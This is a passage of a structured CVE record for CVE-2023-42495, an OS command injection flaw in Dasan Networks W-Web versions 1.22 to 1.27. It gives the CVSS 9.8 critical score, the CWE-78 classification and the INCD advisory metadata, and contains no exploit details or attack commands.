"datePublic": "2023-12-13T12:48:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\u003c/span\u003e\n\n"
}
],
"value": "\nDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-13T12:48:41.608Z",
"orgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"shortName": "INCD"
},
"references": [
{
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"source": {
"advisory": "ILVN-2023-0146",
"discovery": "UNKNOWN"
},
"title": "\t Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"assignerShortName": "INCD",
"cveId": "CVE-2023-42495",
"datePublished": "2023-12-13T12:48:41.608Z",
"dateReserved": "2023-09-11T07:58:19.184Z",
"dateUpdated": "2024-08-02T19:23:39.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}